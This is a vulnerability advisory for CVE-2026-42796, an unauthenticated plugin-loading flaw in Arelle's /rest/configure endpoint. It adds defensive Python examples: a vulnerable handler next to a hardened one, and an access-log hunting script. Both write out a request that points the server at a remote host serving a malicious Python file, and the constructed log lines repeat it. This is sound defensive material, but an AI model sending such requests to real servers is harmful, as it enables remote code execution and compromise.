Cyber Resilience

CVE-2026-42796

Critical · Public PoC

Published: 04 May 2026
Modified: 27 May 2026
KEV Added: not listed
Patch: fixed in 2.39.10
CVSS v4.0 base score: 9.2 (Critical)
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS score: 0.0073 (49.8th percentile)
Risk Priority: 70 (floored blend · peak EPSS)

Summary

CVE-2026-42796 is a critical-severity Missing Authentication for Critical Function (CWE-306) vulnerability in Workiva Arelle. Its CVSS base score is 9.2 (Critical).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). EPSS ranks it at the 49.8th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 AC-14 (Permitted Actions Without Identification or Authentication) and AC-3 (Access Enforcement).

Deeper analysis

CVE-2026-42796 is an unauthenticated remote code execution vulnerability affecting Arelle versions prior to 2.39.10. The issue resides in the /rest/configure REST endpoint, which accepts a plugins query parameter and passes it directly to the plugin manager without any authentication or authorization checks. By supplying a URL pointing to a malicious Python file via this parameter, an attacker can cause the Arelle webserver to download and execute the attacker-controlled code within the Arelle process, running with its existing privileges. The vulnerability is rated with a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and is associated with CWE-306 (Missing Authentication for Critical Function).

Any unauthenticated remote attacker with network access to the Arelle webserver can exploit this vulnerability by crafting an HTTP request to the /rest/configure endpoint with a malicious plugins parameter. Successful exploitation leads to arbitrary code execution on the server, potentially allowing full compromise of the Arelle process, including high confidentiality, integrity, and availability impacts as reflected in the CVSS vector.

Mitigation is available by upgrading to Arelle version 2.39.10 or later, as detailed in the project's release notes. The fixing pull request (#2320) on the Arelle GitHub repository addresses the lack of authentication by implementing proper checks in the plugin manager. Additional details on the vulnerability and its exploitation are provided in the VulnCheck advisory.
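The flaw and fix described above, reduced to a runnable model. This is an added example and not Arelle's code (nor the content of PR #2320): the handler functions, the PluginManager stand-in, the Authorization header scheme and the plugin names in the allowlist are hypothetical; only the endpoint path /rest/configure and the query parameter name plugins come from the advisory. The vulnerable handler forwards whatever plugins value it receives, with no caller identity checked (CWE-306); the hardened handler requires a bearer token and additionally refuses any plugin source that carries a URL scheme, because authentication alone still lets a legitimate user point the server at arbitrary code.

```python
"""
Added example modelling the CWE-306 flaw in a plugin-loading endpoint and one
way to close it. NOT Arelle's code: handlers, PluginManager, header names and
plugin names are hypothetical; /rest/configure and the `plugins` parameter
are the only details taken from the advisory.
"""
import hmac
from urllib.parse import parse_qs, urlsplit


class PluginManager:
    """Stand-in for a plugin manager: records what it was asked to load
    instead of fetching or executing anything."""

    def __init__(self):
        self.loaded = []

    def load(self, spec):
        # In the vulnerable design a URL here is fetched and the Python file
        # is imported into the server process, i.e. attacker code runs with
        # the server's privileges. The stand-in only records the request.
        self.loaded.append(spec)


def vulnerable_configure(query_string, manager):
    """Before: no authentication; the plugins value is forwarded verbatim."""
    params = parse_qs(query_string)
    for spec in params.get("plugins", []):
        manager.load(spec)          # CWE-306: critical function, no caller check
    return 200, "ok"


# Hypothetical allowlist of plugin names that ship with the server.
LOCAL_PLUGIN_ALLOWLIST = frozenset({"validate/local", "reports/summary"})


def hardened_configure(query_string, headers, manager, api_token):
    """After: require a bearer token AND refuse remote plugin sources.

    Authentication closes CWE-306, but an authenticated caller could still
    hand the server a URL, so plugin sources are limited to a local allowlist.
    """
    expected = f"Bearer {api_token}".encode()
    presented = headers.get("Authorization", "").encode()
    # Constant-time comparison so token length/prefix is not leaked by timing.
    if not hmac.compare_digest(presented, expected):
        return 401, "authentication required"

    requested = parse_qs(query_string).get("plugins", [])
    # Validate everything before loading anything, so a bad entry cannot leave
    # the server half-configured.
    for spec in requested:
        # Any URL scheme (http, https, file, ...) means a non-local source.
        if urlsplit(spec).scheme or spec not in LOCAL_PLUGIN_ALLOWLIST:
            return 400, f"plugin source not permitted: {spec}"
    for spec in requested:
        manager.load(spec)
    return 200, "ok"


if __name__ == "__main__":
    attacker_query = "plugins=http://203.0.113.7/evil.py"   # constructed
    print(vulnerable_configure(attacker_query, PluginManager()))
    print(hardened_configure(attacker_query, {}, PluginManager(), "s3cret"))
    print(hardened_configure(attacker_query, {"Authorization": "Bearer s3cret"},
                             PluginManager(), "s3cret"))
```

The two-layer check matters when reviewing a fix for this class of bug: a patch that only adds authentication leaves an authenticated path to code execution, while a patch that only blocks URLs leaves the configuration endpoint open to anyone on the network.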

Vulnerability details

Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.

CWE(s)

CWE-306 Missing Authentication for Critical Function

Related Threats

MITRE ATT&CK Enterprise Techniques [AI]

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.006 Python (Execution)
Adversaries may abuse Python commands and scripts for execution.
T1105 Ingress Tool Transfer (Command and Control)
Adversaries may transfer tools or other files from an external system into a compromised environment.
Why these techniques?

The unauthenticated RCE in the public /rest/configure endpoint enables T1190 (Exploit Public-Facing Application). The attacker-supplied URL causes a server-side download (T1105 Ingress Tool Transfer) followed by Python execution (T1059.006) with the privileges of the Arelle process.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
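A detection view of the same mapping: the request shape the advisory describes (a hit on /rest/configure whose plugins value is a URL) is visible in ordinary HTTP access logs, so it can be hunted for retroactively. The block below is an added example, not Arelle's code or a published detection rule. The log lines are constructed; apart from /rest/configure and the plugins parameter, every address, path and plugin name in them is hypothetical. Remote-source hits are tagged with T1190, T1105 and T1059.006 as above; other hits on the endpoint, including POSTs whose body is not logged, are tagged T1190 for review.

```python
"""
Added example: triage of HTTP access logs for CVE-2026-42796 exploitation
attempts, mapped to the ATT&CK techniques in the advisory. Not Arelle's code.
Log lines are constructed; only /rest/configure and `plugins` are from the
advisory, everything else in them is hypothetical.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Common Log Format, with the request line split into method / target / version.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2026:10:01:02 +0000] "GET /rest/status HTTP/1.1" 200 512
203.0.113.7 - - [04/May/2026:10:03:44 +0000] "GET /rest/configure?plugins=http://203.0.113.7/p.py HTTP/1.1" 200 87
203.0.113.7 - - [04/May/2026:10:03:50 +0000] "GET /rest/configure?plugins=https%3A%2F%2F203.0.113.7%2Fp.py HTTP/1.1" 200 87
10.0.0.8 - - [04/May/2026:10:05:10 +0000] "GET /rest/configure?plugins=validate/local HTTP/1.1" 200 87
198.51.100.2 - - [04/May/2026:10:06:00 +0000] "POST /rest/configure HTTP/1.1" 200 87
"""


def classify(line):
    """Return a finding dict for a request to /rest/configure, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if target.path != "/rest/configure":
        return None
    # parse_qs percent-decodes once; unquote again so a double-encoded value
    # (e.g. http%253A%252F%252F...) does not slip past the scheme check.
    plugins = [unquote(v) for v in parse_qs(target.query).get("plugins", [])]
    remote = [p for p in plugins if urlsplit(p).scheme]
    if remote:
        # A URL in plugins is exactly the exploit shape from the advisory.
        severity, techniques = "high", ["T1190", "T1105", "T1059.006"]
    else:
        # Any other hit on the endpoint (including a POST whose body is not
        # logged) still deserves a look on an unpatched host.
        severity, techniques = "review", ["T1190"]
    return {
        "src": m["src"],
        "ts": m["ts"],
        "method": m["method"],
        "status": m["status"],  # 200 on a remote spec suggests the load was accepted
        "plugins": plugins,
        "remote_sources": remote,
        "severity": severity,
        "techniques": techniques,
    }


def hunt(log_text):
    """Run classify() over every line; findings are returned in log order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f["severity"], f["src"], f["method"], f["remote_sources"] or f["plugins"])
```

On a patched host (2.39.10 or later) a remote-source hit should no longer return 200; a 200 paired with a URL in plugins is the strongest signal that the request landed on a vulnerable version and warrants host-level follow-up (new Python files written by the server process, outbound fetches to the source address).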

CVEs Like This One

CVE-2026-27509 (shared CWE-306)
CVE-2025-24865 (shared CWE-306)
CVE-2026-4810 (shared CWE-306)
CVE-2025-53847 (shared CWE-306)
CVE-2025-61757 (shared CWE-306)
CVE-2025-68715 (shared CWE-306)
CVE-2026-21992 (shared CWE-306)
CVE-2025-26362 (shared CWE-306)
CVE-2026-48692 (shared CWE-306)
CVE-2022-50981 (shared CWE-306)

Affected Assets

workiva
arelle
< 2.39.10 (fixed in 2.39.10)

Mitigating Controls (NIST 800-53 r5) [AI]

prevent · AC-14 (Permitted Actions Without Identification or Authentication): Directly mitigates the vulnerability by prohibiting unauthenticated access to critical functions such as the /rest/configure endpoint's plugins parameter, which enables remote code execution.

prevent: Enforces security requirements on publicly accessible web endpoints such as /rest/configure to prevent unauthorized remote code execution via unauthenticated requests.

prevent · AC-3 (Access Enforcement): Enforces approved authorizations to block unauthenticated access to the plugin manager through the vulnerable REST endpoint.
